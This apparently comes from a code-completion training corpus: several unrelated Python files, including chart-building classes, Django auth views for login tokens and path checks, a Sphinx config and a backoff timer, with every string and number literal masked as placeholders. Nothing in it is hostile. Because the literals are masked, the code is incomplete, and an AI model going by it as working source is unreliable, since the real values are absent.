ValueRef ( value = <NUM_LIT:100> ) , <EOL> fill = ValueRef ( scale = "<STR_LIT>" , field = '<STR_LIT>' ) ) <EOL> marks = [ Mark ( type = '<STR_LIT>' , <EOL> properties = MarkProperties ( enter = enter_props ) ) ] <EOL> mark_group = Mark ( type = '<STR_LIT>' , from_ = from_ , marks = marks ) <EOL> self . marks . append ( mark_group ) <EOL> class Bar ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Bar , self ) . __init__ ( * args , ** kwargs ) <EOL> self . scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = '<STR_LIT>' , range = '<STR_LIT:width>' , zero = False , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , range = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> ] <EOL> self . 
axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> stats_transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) , <EOL> Transform ( type = '<STR_LIT>' , value = '<STR_LIT>' ) ] <EOL> stats_data = Data ( name = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> transform = stats_transform ) <EOL> self . data . append ( stats_data ) <EOL> from_transform = [ <EOL> Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) , <EOL> Transform ( type = '<STR_LIT>' , point = '<STR_LIT>' , height = '<STR_LIT>' ) <EOL> ] <EOL> from_ = MarkRef ( data = '<STR_LIT>' , transform = from_transform ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT:x>' , field = '<STR_LIT>' ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT:y>' ) , <EOL> y2 = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT>' ) , <EOL> width = ValueRef ( scale = '<STR_LIT:x>' , band = True , offset = - <NUM_LIT:1> ) , <EOL> fill = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> marks = [ Mark ( type = '<STR_LIT>' , <EOL> properties = MarkProperties ( enter = enter_props ) ) ] <EOL> mark_group = Mark ( type = '<STR_LIT>' , from_ = from_ , marks = marks ) <EOL> self . marks . append ( mark_group ) <EOL> StackedBar = Bar <EOL> class Area ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Area , self ) . __init__ ( * args , ** kwargs ) <EOL> x_type = '<STR_LIT:time>' if self . _is_datetime else '<STR_LIT>' <EOL> self . 
scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = x_type , range = '<STR_LIT:width>' , zero = False , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , range = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> ] <EOL> self . axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> stats_transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) , <EOL> Transform ( type = '<STR_LIT>' , value = '<STR_LIT>' ) ] <EOL> stats_data = Data ( name = '<STR_LIT>' , source = '<STR_LIT>' , <EOL> transform = stats_transform ) <EOL> self . data . append ( stats_data ) <EOL> from_transform = [ <EOL> Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) , <EOL> Transform ( type = '<STR_LIT>' , point = '<STR_LIT>' , height = '<STR_LIT>' ) <EOL> ] <EOL> from_ = MarkRef ( data = '<STR_LIT>' , transform = from_transform ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT:x>' , field = '<STR_LIT>' ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT:y>' ) , <EOL> y2 = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT>' ) , <EOL> interpolate = ValueRef ( value = '<STR_LIT>' ) , <EOL> fill = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> marks = [ Mark ( type = '<STR_LIT>' , <EOL> properties = MarkProperties ( enter = enter_props ) ) ] <EOL> mark_group = Mark ( type = '<STR_LIT>' , from_ = from_ , marks = marks ) <EOL> self . marks . 
append ( mark_group ) <EOL> StackedArea = Area <EOL> class GroupedBar ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , data_labels = False , <EOL> label_color = '<STR_LIT>' , fontsize = <NUM_LIT:12> , baseline = '<STR_LIT>' , <EOL> * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . label_color = label_color <EOL> self . fontsize = fontsize <EOL> self . baseline = baseline <EOL> self . data_labels = data_labels <EOL> super ( GroupedBar , self ) . __init__ ( data = data , * args , ** kwargs ) <EOL> self . scales += [ <EOL> Scale ( name = '<STR_LIT:x>' , type = '<STR_LIT>' , range = '<STR_LIT:width>' , padding = <NUM_LIT> , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) , <EOL> Scale ( name = '<STR_LIT:y>' , range = '<STR_LIT>' , nice = True , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = "<STR_LIT>" ) ) , <EOL> Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , range = '<STR_LIT>' , <EOL> domain = DataRef ( data = '<STR_LIT>' , field = '<STR_LIT>' ) ) <EOL> ] <EOL> self . axes += [ Axis ( type = '<STR_LIT:x>' , scale = '<STR_LIT:x>' ) , <EOL> Axis ( type = '<STR_LIT:y>' , scale = '<STR_LIT:y>' ) ] <EOL> mark_props = MarkProperties ( <EOL> enter = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT>' ) , <EOL> y2 = ValueRef ( scale = '<STR_LIT:y>' , value = <NUM_LIT:0> ) , <EOL> width = ValueRef ( scale = '<STR_LIT>' , band = True , offset = - <NUM_LIT:1> ) , <EOL> fill = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) ) ) <EOL> mark_group_marks = [ Mark ( type = '<STR_LIT>' , properties = mark_props ) ] <EOL> if self . 
data_labels : <EOL> mark_props_text = MarkProperties ( <EOL> enter = PropertySet ( <EOL> x = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' , offset = <NUM_LIT:0> ) , <EOL> dx = ValueRef ( scale = '<STR_LIT>' , band = True , mult = <NUM_LIT:0.5> ) , <EOL> y = ValueRef ( scale = '<STR_LIT:y>' , field = '<STR_LIT>' ) , <EOL> align = ValueRef ( value = '<STR_LIT>' ) , <EOL> text = ValueRef ( field = '<STR_LIT>' ) , <EOL> baseline = ValueRef ( value = self . baseline ) , <EOL> fill = ValueRef ( value = self . label_color ) , <EOL> font_size = ValueRef ( value = self . fontsize ) ) ) <EOL> mark_group_marks . append ( Mark ( type = '<STR_LIT:text>' , <EOL> properties = mark_props_text ) ) <EOL> mark_group_from = MarkRef ( <EOL> data = '<STR_LIT>' , <EOL> transform = [ Transform ( type = '<STR_LIT>' , keys = [ '<STR_LIT>' ] ) ] ) <EOL> mark_group_props = MarkProperties ( <EOL> enter = PropertySet ( x = ValueRef ( scale = '<STR_LIT:x>' , field = '<STR_LIT:key>' ) , <EOL> width = ValueRef ( scale = '<STR_LIT:x>' , band = True ) ) ) <EOL> mark_group_scales = [ Scale ( name = "<STR_LIT>" , range = "<STR_LIT:width>" , type = "<STR_LIT>" , <EOL> domain = DataRef ( field = "<STR_LIT>" ) ) ] <EOL> mark_group = Mark ( <EOL> type = '<STR_LIT>' , from_ = mark_group_from , <EOL> properties = mark_group_props , scales = mark_group_scales , <EOL> marks = mark_group_marks ) <EOL> self . marks . append ( mark_group ) <EOL> class Map ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , geo_data = None , projection = "<STR_LIT>" , <EOL> center = None , translate = None , scale = None , rotate = None , <EOL> data_bind = None , data_key = None , map_key = None , <EOL> brew = '<STR_LIT>' , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> self . raw_data = data <EOL> self . data_key = data_key <EOL> super ( Map , self ) . 
__init__ ( no_data = True , * args , ** kwargs ) <EOL> geo_kwargs = { } <EOL> for param in [ ( '<STR_LIT>' , projection ) , ( '<STR_LIT>' , center ) , <EOL> ( '<STR_LIT>' , translate ) , ( '<STR_LIT>' , scale ) , <EOL> ( '<STR_LIT>' , rotate ) ] : <EOL> if param [ <NUM_LIT:1> ] : <EOL> geo_kwargs [ param [ <NUM_LIT:0> ] ] = param [ <NUM_LIT:1> ] <EOL> if not translate : <EOL> geo_kwargs [ '<STR_LIT>' ] = [ self . width / <NUM_LIT:2> , self . height / <NUM_LIT:2> ] <EOL> for dat in geo_data : <EOL> transforms = [ ] <EOL> if data is not None and list ( map_key . keys ( ) ) [ <NUM_LIT:0> ] == dat [ '<STR_LIT:name>' ] : <EOL> get_brewer = True <EOL> if not data_key or not data_bind : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . data [ '<STR_LIT>' ] = Data . keypairs ( <EOL> data , columns = [ data_key , data_bind ] <EOL> ) <EOL> key_join = '<STR_LIT:.>' . join ( [ '<STR_LIT:data>' , map_key [ dat [ '<STR_LIT:name>' ] ] ] ) <EOL> data_transform = Transform ( <EOL> type = '<STR_LIT>' , key = key_join , with_ = '<STR_LIT>' , <EOL> with_key = '<STR_LIT>' , as_ = '<STR_LIT:value>' , default = '<STR_LIT>' <EOL> ) <EOL> transforms . append ( data_transform ) <EOL> null_trans = Transform ( <EOL> type = '<STR_LIT>' , test = "<STR_LIT>" <EOL> ) <EOL> transforms . append ( null_trans ) <EOL> else : <EOL> get_brewer = False <EOL> geo_transform = Transform ( <EOL> type = '<STR_LIT>' , value = "<STR_LIT:data>" , ** geo_kwargs <EOL> ) <EOL> transforms . append ( geo_transform ) <EOL> self . data [ dat [ '<STR_LIT:name>' ] ] = Data ( <EOL> name = dat [ '<STR_LIT:name>' ] , url = dat [ '<STR_LIT:url>' ] , transform = transforms <EOL> ) <EOL> if dat . get ( '<STR_LIT>' ) : <EOL> self . data [ dat [ '<STR_LIT:name>' ] ] . 
format = { <EOL> '<STR_LIT:type>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : dat [ '<STR_LIT>' ] <EOL> } <EOL> geo_from = MarkRef ( data = dat [ '<STR_LIT:name>' ] ) <EOL> enter_props = PropertySet ( <EOL> stroke = ValueRef ( value = '<STR_LIT>' ) , <EOL> path = ValueRef ( field = '<STR_LIT:path>' ) <EOL> ) <EOL> if get_brewer : <EOL> update_props = PropertySet ( <EOL> fill = ValueRef ( scale = '<STR_LIT>' , field = '<STR_LIT>' ) <EOL> ) <EOL> domain = [ Data . serialize ( data [ data_bind ] . min ( ) ) , <EOL> Data . serialize ( data [ data_bind ] . quantile ( <NUM_LIT> ) ) ] <EOL> scale = Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , domain = domain , <EOL> range = brews [ brew ] ) <EOL> self . scales [ '<STR_LIT>' ] = scale <EOL> else : <EOL> update_props = PropertySet ( fill = ValueRef ( value = '<STR_LIT>' ) ) <EOL> mark_props = MarkProperties ( enter = enter_props , update = update_props ) <EOL> self . marks . append ( <EOL> Mark ( type = '<STR_LIT:path>' , from_ = geo_from , properties = mark_props ) <EOL> ) <EOL> def rebind ( self , column = None , brew = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . data [ '<STR_LIT>' ] = Data . keypairs ( <EOL> self . raw_data , columns = [ self . data_key , column ] ) <EOL> domain = [ Data . serialize ( self . raw_data [ column ] . min ( ) ) , <EOL> Data . serialize ( self . raw_data [ column ] . quantile ( <NUM_LIT> ) ) ] <EOL> scale = Scale ( name = '<STR_LIT>' , type = '<STR_LIT>' , domain = domain , <EOL> range = brews [ brew ] ) <EOL> self . scales [ '<STR_LIT>' ] = scale <EOL> class Pie ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , data = None , inner_radius = <NUM_LIT:0> , outer_radius = None , <EOL> * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Pie , self ) . __init__ ( data , * args , ** kwargs ) <EOL> outer_radius = outer_radius or min ( self . width , self . height ) / <NUM_LIT:2> <EOL> self . 
scales [ "<STR_LIT>" ] = Scale ( <EOL> name = "<STR_LIT>" , type = "<STR_LIT>" , range = "<STR_LIT>" , <EOL> domain = DataRef ( data = "<STR_LIT>" , field = "<STR_LIT>" ) ) <EOL> transform = MarkRef ( <EOL> data = "<STR_LIT>" , transform = [ Transform ( type = "<STR_LIT>" , value = "<STR_LIT>" ) ] ) <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( group = "<STR_LIT:width>" , mult = <NUM_LIT:0.5> ) , <EOL> y = ValueRef ( group = "<STR_LIT>" , mult = <NUM_LIT:0.5> ) , <EOL> start_angle = ValueRef ( field = "<STR_LIT>" ) , <EOL> end_angle = ValueRef ( field = "<STR_LIT>" ) , <EOL> inner_radius = ValueRef ( value = inner_radius ) , <EOL> outer_radius = ValueRef ( value = outer_radius ) , <EOL> stroke = ValueRef ( value = "<STR_LIT>" ) , <EOL> fill = ValueRef ( scale = "<STR_LIT>" , field = "<STR_LIT>" ) ) <EOL> mark = Mark ( type = "<STR_LIT>" , from_ = transform , <EOL> properties = MarkProperties ( enter = enter_props ) ) <EOL> self . marks . append ( mark ) <EOL> class Word ( Chart ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> super ( Word , self ) . __init__ ( * args , ** kwargs ) <EOL> self . scales [ "<STR_LIT>" ] = Scale ( <EOL> name = "<STR_LIT>" , type = "<STR_LIT>" , range = "<STR_LIT>" , <EOL> domain = DataRef ( data = "<STR_LIT>" , field = "<STR_LIT>" ) ) <EOL> wordcloud_transform = [ <EOL> Transform ( type = "<STR_LIT>" , text = "<STR_LIT>" , <EOL> font = "<STR_LIT>" , font_size = "<STR_LIT>" , <EOL> rotate = { "<STR_LIT>" : list ( range ( - <NUM_LIT> , <NUM_LIT> , <NUM_LIT:30> ) ) } ) ] <EOL> self . data [ <NUM_LIT:0> ] . 
transform = wordcloud_transform <EOL> enter_props = PropertySet ( <EOL> x = ValueRef ( field = "<STR_LIT:x>" ) , <EOL> y = ValueRef ( field = "<STR_LIT:y>" ) , <EOL> angle = ValueRef ( field = "<STR_LIT>" ) , <EOL> align = ValueRef ( value = "<STR_LIT>" ) , <EOL> baseline = ValueRef ( value = "<STR_LIT>" ) , <EOL> font = ValueRef ( field = "<STR_LIT>" ) , <EOL> font_size = ValueRef ( field = "<STR_LIT>" ) , <EOL> text = ValueRef ( field = "<STR_LIT>" ) , <EOL> fill = ValueRef ( scale = "<STR_LIT>" , field = "<STR_LIT>" ) ) <EOL> mark = Mark ( type = "<STR_LIT:text>" , from_ = MarkRef ( data = "<STR_LIT>" ) , <EOL> properties = MarkProperties ( enter = enter_props ) ) <EOL> self . marks . append ( mark ) </s>
<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> """<STR_LIT>""" <EOL> from django . conf import settings <EOL> from django . contrib import auth <EOL> from django . core . cache import cache <EOL> from django . core . mail import send_mail <EOL> from django . core . urlresolvers import reverse <EOL> from django . template . loader import render_to_string <EOL> from django . utils . decorators import method_decorator <EOL> from django . views . decorators . csrf import ensure_csrf_cookie <EOL> from django . views . generic import View <EOL> from wwwhisper_auth import http <EOL> from wwwhisper_auth import login_token <EOL> from wwwhisper_auth import models <EOL> from wwwhisper_auth import url_utils <EOL> from wwwhisper_auth . backend import AuthenticationError <EOL> import logging <EOL> import urllib <EOL> logger = logging . getLogger ( __name__ ) <EOL> def get_user ( request ) : <EOL> """<STR_LIT>""" <EOL> user_id = request . session . get ( '<STR_LIT>' , None ) <EOL> if user_id is not None : <EOL> return request . site . users . get_unique ( lambda user : user . id == user_id ) <EOL> return None <EOL> class Auth ( View ) : <EOL> """<STR_LIT>""" <EOL> @ http . never_ever_cache <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> encoded_path = self . _extract_encoded_path_argument ( request ) <EOL> if encoded_path is None : <EOL> return http . HttpResponseBadRequest ( <EOL> "<STR_LIT>" ) <EOL> if '<STR_LIT>' in request . META : <EOL> return http . HttpResponseBadRequest ( <EOL> "<STR_LIT>" ) <EOL> debug_msg = "<STR_LIT>" % ( encoded_path ) <EOL> path_validation_error = None <EOL> if url_utils . contains_fragment ( encoded_path ) : <EOL> path_validation_error = "<STR_LIT>" <EOL> else : <EOL> stripped_path = url_utils . strip_query ( encoded_path ) <EOL> decoded_path = url_utils . decode ( stripped_path ) <EOL> decoded_path = url_utils . collapse_slashes ( decoded_path ) <EOL> if not url_utils . 
is_canonical ( decoded_path ) : <EOL> path_validation_error = '<STR_LIT>' '<STR_LIT>' <EOL> if path_validation_error is not None : <EOL> logger . debug ( '<STR_LIT>' % ( debug_msg ) ) <EOL> return http . HttpResponseBadRequest ( path_validation_error ) <EOL> user = get_user ( request ) <EOL> location = request . site . locations . find_location ( decoded_path ) <EOL> if user is not None : <EOL> debug_msg += "<STR_LIT>" % ( user . email ) <EOL> respone = None <EOL> if location is not None and location . can_access ( user ) : <EOL> logger . debug ( '<STR_LIT>' % ( debug_msg ) ) <EOL> response = http . HttpResponseOK ( '<STR_LIT>' ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' % ( debug_msg ) ) <EOL> response = http . HttpResponseNotAuthorized ( <EOL> self . _html_or_none ( request , '<STR_LIT>' , <EOL> { '<STR_LIT:email>' : user . email } ) ) <EOL> response [ '<STR_LIT>' ] = user . email <EOL> return response <EOL> if ( location is not None and location . open_access_granted ( ) and <EOL> not location . open_access_requires_login ( ) ) : <EOL> logger . debug ( '<STR_LIT>' <EOL> % ( debug_msg ) ) <EOL> return http . HttpResponseOK ( '<STR_LIT>' ) <EOL> logger . debug ( '<STR_LIT>' % ( debug_msg ) ) <EOL> return http . HttpResponseNotAuthenticated ( <EOL> self . _html_or_none ( request , '<STR_LIT>' , request . site . skin ( ) ) ) <EOL> def _html_or_none ( self , request , template , context = { } ) : <EOL> """<STR_LIT>""" <EOL> if ( http . accepts_html ( request . META . get ( '<STR_LIT>' ) ) ) : <EOL> return render_to_string ( template , context ) <EOL> return None <EOL> @ staticmethod <EOL> def _extract_encoded_path_argument ( request ) : <EOL> """<STR_LIT>""" <EOL> request_path_and_args = request . get_full_path ( ) <EOL> assert request_path_and_args . startswith ( request . path ) <EOL> args = request_path_and_args [ len ( request . path ) : ] <EOL> if not args . 
startswith ( '<STR_LIT>' ) : <EOL> return None <EOL> return args [ len ( '<STR_LIT>' ) : ] <EOL> class CsrfToken ( View ) : <EOL> """<STR_LIT>""" <EOL> @ http . never_ever_cache <EOL> @ method_decorator ( ensure_csrf_cookie ) <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> return http . HttpResponseNoContent ( ) <EOL> class Login ( http . RestView ) : <EOL> """<STR_LIT>""" <EOL> def post ( self , request , assertion ) : <EOL> """<STR_LIT>""" <EOL> if assertion == None : <EOL> return http . HttpResponseBadRequest ( '<STR_LIT>' ) <EOL> try : <EOL> user = auth . authenticate ( site = request . site , <EOL> site_url = request . site_url , <EOL> assertion = assertion ) <EOL> except AuthenticationError as ex : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return http . HttpResponseBadRequest ( str ( ex ) ) <EOL> if user is not None : <EOL> auth . login ( request , user ) <EOL> request . session [ '<STR_LIT>' ] = user . id <EOL> logger . debug ( '<STR_LIT>' % ( user . email ) ) <EOL> return http . HttpResponseNoContent ( ) <EOL> else : <EOL> return http . HttpResponseNotAuthorized ( ) <EOL> class LoginToken ( View ) : <EOL> """<STR_LIT>""" <EOL> @ http . never_ever_cache <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> token = request . GET . get ( '<STR_LIT>' ) <EOL> if token == None : <EOL> return http . HttpResponseBadRequest ( '<STR_LIT>' ) <EOL> try : <EOL> user = auth . authenticate ( site = request . site , <EOL> site_url = request . site_url , <EOL> token = token ) <EOL> except AuthenticationError as ex : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> return http . HttpResponseBadRequest ( str ( ex ) ) <EOL> if user is not None : <EOL> auth . login ( request , user ) <EOL> request . session [ '<STR_LIT>' ] = user . id <EOL> logger . debug ( '<STR_LIT>' % ( user . email ) ) <EOL> redirect_to = request . GET . get ( '<STR_LIT>' ) <EOL> if ( redirect_to is None or <EOL> not url_utils . 
validate_redirection_target ( redirect_to ) ) : <EOL> redirect_to = '<STR_LIT:/>' <EOL> return http . HttpResponseRedirect ( request . site_url + redirect_to ) <EOL> else : <EOL> return http . HttpResponseNotAuthorized ( ) <EOL> class SendToken ( http . RestView ) : <EOL> @ http . never_ever_cache <EOL> def post ( self , request , email , path ) : <EOL> """<STR_LIT>""" <EOL> if email == None : <EOL> return http . HttpResponseBadRequest ( '<STR_LIT>' ) <EOL> if not models . is_email_valid ( email ) : <EOL> return http . HttpResponseBadRequest ( '<STR_LIT>' ) <EOL> if path is None or not url_utils . validate_redirection_target ( path ) : <EOL> path = '<STR_LIT:/>' <EOL> token = login_token . generate_login_token ( <EOL> request . site , site_url = request . site_url , email = email ) <EOL> params = urllib . urlencode ( dict ( next = path , token = token ) ) <EOL> url = '<STR_LIT>' . format ( <EOL> request . site_url , reverse ( '<STR_LIT>' ) , params ) <EOL> subject = '<STR_LIT>' . format ( request . site_url ) <EOL> from_email = settings . TOKEN_EMAIL_FROM <EOL> body = ( <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' . format ( url ) + <EOL> '<STR_LIT:\n>' + <EOL> '<STR_LIT>' ) <EOL> send_mail ( subject , body , from_email , [ email ] , fail_silently = False ) <EOL> return http . HttpResponseNoContent ( ) <EOL> class Logout ( http . RestView ) : <EOL> """<STR_LIT>""" <EOL> def post ( self , request ) : <EOL> """<STR_LIT>""" <EOL> auth . logout ( request ) <EOL> response = http . HttpResponseNoContent ( ) <EOL> return response <EOL> class WhoAmI ( http . RestView ) : <EOL> """<STR_LIT>""" <EOL> def get ( self , request ) : <EOL> """<STR_LIT>""" <EOL> user = get_user ( request ) <EOL> if user is not None : <EOL> return http . HttpResponseOKJson ( { '<STR_LIT:email>' : user . email } ) <EOL> return http . HttpResponseNotAuthenticated ( ) </s>
<s> def _fix_import_path ( ) : <EOL> """<STR_LIT>""" <EOL> import sys , os <EOL> try : <EOL> import wtforms <EOL> except ImportError : <EOL> parent_dir = os . path . abspath ( os . path . join ( os . path . dirname ( os . path . abspath ( __file__ ) ) , '<STR_LIT:..>' ) ) <EOL> build_lib = os . path . join ( parent_dir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if os . path . isdir ( build_lib ) : <EOL> sys . path . insert ( <NUM_LIT:0> , build_lib ) <EOL> else : <EOL> sys . path . insert ( <NUM_LIT:0> , parent_dir ) <EOL> _fix_import_path ( ) <EOL> extensions = [ '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = '<STR_LIT>' <EOL> copyright = '<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> today_fmt = '<STR_LIT>' <EOL> pygments_style = '<STR_LIT>' <EOL> html_style = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_last_updated_fmt = '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] </s>
<s> from __future__ import absolute_import <EOL> import random <EOL> class BackoffTimer ( object ) : <EOL> def __init__ ( self , ratio = <NUM_LIT:1> , max_interval = None , min_interval = None ) : <EOL> self . c = <NUM_LIT:0> <EOL> self . ratio = ratio <EOL> self . max_interval = max_interval <EOL> self . min_interval = min_interval <EOL> def is_reset ( self ) : <EOL> return self . c == <NUM_LIT:0> <EOL> def reset ( self ) : <EOL> self . c = <NUM_LIT:0> <EOL> return self <EOL> def success ( self ) : <EOL> self . c = max ( self . c - <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> return self <EOL> def failure ( self ) : <EOL> self . c += <NUM_LIT:1> <EOL> return self <EOL> def get_interval ( self ) : <EOL> k = pow ( <NUM_LIT:2> , self . c ) - <NUM_LIT:1> <EOL> interval = random . random ( ) * k * self . ratio <EOL> if self . max_interval is not None : <EOL> interval = min ( interval , self . max_interval ) <EOL> if self . min_interval is not None : <EOL> interval = max ( interval , self . min_interval ) <EOL> return interval </s>
<s> VERSION = ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) </s>
<s> from django . core . urlresolvers import get_resolver <EOL> from devil import Resource <EOL> try : <EOL> from collections import OrderedDict as dict <EOL> except ImportError : <EOL> pass <EOL> class DocumentedResource ( Resource ) : <EOL> """<STR_LIT>""" <EOL> methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ) <EOL> def get_documentation ( self , request , * args , ** kw ) : <EOL> """<STR_LIT>""" <EOL> ret = dict ( ) <EOL> ret [ '<STR_LIT>' ] = self . name ( ) <EOL> ret [ '<STR_LIT>' ] = self . _get_url_doc ( ) <EOL> ret [ '<STR_LIT:description>' ] = self . __doc__ <EOL> ret [ '<STR_LIT>' ] = self . _get_representation_doc ( ) <EOL> ret [ '<STR_LIT>' ] = self . _get_method_doc ( ) <EOL> return ret <EOL> def _serialize_object ( self , response_data , request ) : <EOL> """<STR_LIT>""" <EOL> if self . _is_doc_request ( request ) : <EOL> return response_data <EOL> else : <EOL> return super ( DocumentedResource , self ) . _serialize_object ( <EOL> response_data , request ) <EOL> def _validate_output_data ( <EOL> self , original_res , serialized_res , formatted_res , request ) : <EOL> """<STR_LIT>""" <EOL> if self . _is_doc_request ( request ) : <EOL> return <EOL> else : <EOL> return super ( DocumentedResource , self ) . _validate_output_data ( <EOL> original_res , serialized_res , formatted_res , request ) <EOL> def _get_method ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if self . _is_doc_request ( request ) : <EOL> return self . get_documentation <EOL> else : <EOL> return super ( DocumentedResource , self ) . _get_method ( request ) <EOL> def _is_doc_request ( self , request ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' in request . GET <EOL> def _get_representation_doc ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . representation : <EOL> return '<STR_LIT>' <EOL> fields = { } <EOL> for name , field in self . representation . fields . items ( ) : <EOL> fields [ name ] = self . 
_get_field_doc ( field ) <EOL> return fields <EOL> def _get_field_doc ( self , field ) : <EOL> """<STR_LIT>""" <EOL> fieldspec = dict ( ) <EOL> fieldspec [ '<STR_LIT:type>' ] = field . __class__ . __name__ <EOL> fieldspec [ '<STR_LIT>' ] = field . required <EOL> fieldspec [ '<STR_LIT>' ] = [ { validator . __class__ . __name__ : validator . __dict__ } for validator in field . validators ] <EOL> return fieldspec <EOL> def _get_url_doc ( self ) : <EOL> """<STR_LIT>""" <EOL> resolver = get_resolver ( None ) <EOL> possibilities = resolver . reverse_dict . getlist ( self ) <EOL> urls = [ possibility [ <NUM_LIT:0> ] for possibility in possibilities ] <EOL> return urls <EOL> def _get_method_doc ( self ) : <EOL> """<STR_LIT>""" <EOL> ret = { } <EOL> for method_name in self . methods : <EOL> method = getattr ( self , method_name , None ) <EOL> if method : <EOL> ret [ method_name ] = method . __doc__ <EOL> return ret </s>
<s> from django import forms <EOL> from django . core . exceptions import ValidationError <EOL> from simple import models <EOL> class Person ( forms . ModelForm ) : <EOL> def validate ( self , data ) : <EOL> spec = self . __class__ ( data ) <EOL> if not spec . is_valid ( ) : <EOL> raise ValidationError ( spec . errors ) <EOL> if len ( set ( data ) - set ( spec . fields ) ) > <NUM_LIT:0> : <EOL> raise ValidationError ( '<STR_LIT>' ) <EOL> return spec . cleaned_data <EOL> id = forms . Field ( required = False ) <EOL> class Meta : <EOL> model = models . Person </s>
